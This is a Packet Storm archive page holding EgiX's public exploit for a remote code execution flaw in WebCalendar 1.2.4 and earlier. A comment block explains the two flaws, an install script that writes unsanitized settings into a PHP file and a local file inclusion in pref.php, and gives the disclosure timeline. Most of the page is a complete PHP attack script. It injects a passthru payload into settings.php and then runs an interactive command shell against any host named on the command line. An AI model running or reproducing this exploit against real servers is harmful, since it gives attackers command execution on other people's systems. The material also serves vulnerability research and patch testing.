what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WebCalendar 1.2.4 Remote Code Execution

WebCalendar 1.2.4 Remote Code Execution
Posted Apr 30, 2012
Authored by EgiX

WebCalendar versions 1.2.4 and below suffer from a remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2012-1495, CVE-2012-1496
SHA-256 | 505518c769aa0a8f543863fa3ee2b3bea199044e7d9263695e1c25fffbeb5719

WebCalendar 1.2.4 Remote Code Execution

Change Mirror Download
<?php

/*
-----------------------------------------------------------------------
WebCalendar <= 1.2.4 (install/index.php) Remote Code Executionn Exploit
-----------------------------------------------------------------------

author..........: Egidio Romano aka EgiX
mail............: n0b0d13s[at]gmail[dot]com
software link...: https://sourceforge.net/projects/webcalendar/

+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+

[-] vulnerable code in /install/index.php (CVE-2012-1495)

674. $y = getPostValue ( 'app_settings' );
675. if ( ! empty ( $y ) ) {
676. $settings['single_user_login'] = getPostValue ( 'form_single_user_login' );
677. $settings['readonly'] = getPostValue ( 'form_readonly' );
...
724. // Save settings to file now.
725. if ( ! empty ( $x ) || ! empty ( $y ) ){
726. $fd = @fopen ( $file, 'w+b', false );
727. if ( empty ( $fd ) ) {
728. if ( @file_exists ( $file ) ) {
729. $onloadDetailStr =
730. translate ( 'Please change the file permissions of this file', true );
731. } else {
732. $onloadDetailStr =
733. translate ( 'Please change includes dir permission', true );
734. }
735. $onload = "alert('" . $errorFileWriteStr . $file. "\\n" .
736. $onloadDetailStr . ".');";
737. } else {
738. if ( function_exists ( "date_default_timezone_set" ) )
739. date_default_timezone_set ( "America/New_York");
740. fwrite ( $fd, "<?php\r\n" );
741. fwrite ( $fd, '/* updated via install/index.php on ' . date ( 'r' ) . "\r\n" );
742. foreach ( $settings as $k => $v ) {
743. if ( $v != '<br />' && $v != '' )
744. fwrite ( $fd, $k . ': ' . $v . "\r\n" );
745. }

Restricted access to this script isn't properly realized, so an attacker might be able
to update /includes/settings.php with arbitrary values or inject PHP code into it.

[-] vulnerable code to LFI in /pref.php (CVE-2012-1496)

70. if ( ! empty ( $_POST ) && empty ( $error )) {
71. $my_theme = '';
72. $currenttab = getPostValue ( 'currenttab' );
73. save_pref ( $_POST, 'post' );
74.
75. if ( ! empty ( $my_theme ) ) {
76. $theme = 'themes/'. $my_theme . '_pref.php';
77. include_once $theme;
78. save_pref ( $webcal_theme, 'theme' );
79. }

Input passed through $_POST['pref_THEME'] isn't properly sanitized before being assigned
to $my_theme variable, this can be exploited to include arbitrary local files at line 77.
Exploitation of this vulnerability requires authentication and magic_quotes_gpc = off.

[-] Disclosure timeline:

[02/10/2011] - Vulnerabilities discovered
[04/10/2011] - Vendor notified to http://sourceforge.net/support/tracker.php?aid=3418570
[20/02/2012] - First vendor response
[28/02/2012] - Vendor fix committed to CVS
[29/02/2012] - Version 1.2.5 released
[02/03/2012] - CVE numbers requested
[02/03/2012] - Assigned CVE-2012-1495 and CVE-2012-1496
[23/04/2012] - Public disclosure

*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80))) die( "\n[-] No response from {$host}:80\n");
fwrite($sock, $packet);
return stream_get_contents($sock);
}

print "\n+-------------------------------------------------------------+";
print "\n| WebCalendar <= 1.2.4 Remote Code Executionn Exploit by EgiX |";
print "\n+-------------------------------------------------------------+\n";

if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <path>\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /webcalendar/\n";
die();
}

list($host, $path) = array($argv[1], $argv[2]);

$phpcode = "*/print(____);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die;";
$payload = "app_settings=1&form_user_inc=user.php&form_single_user_login={$phpcode}";

$packet = "POST {$path}install/index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";

http_send($host, $packet);

$packet = "GET {$path}includes/settings.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

while(1)
{
print "\nwebcalendar-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match('/____(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close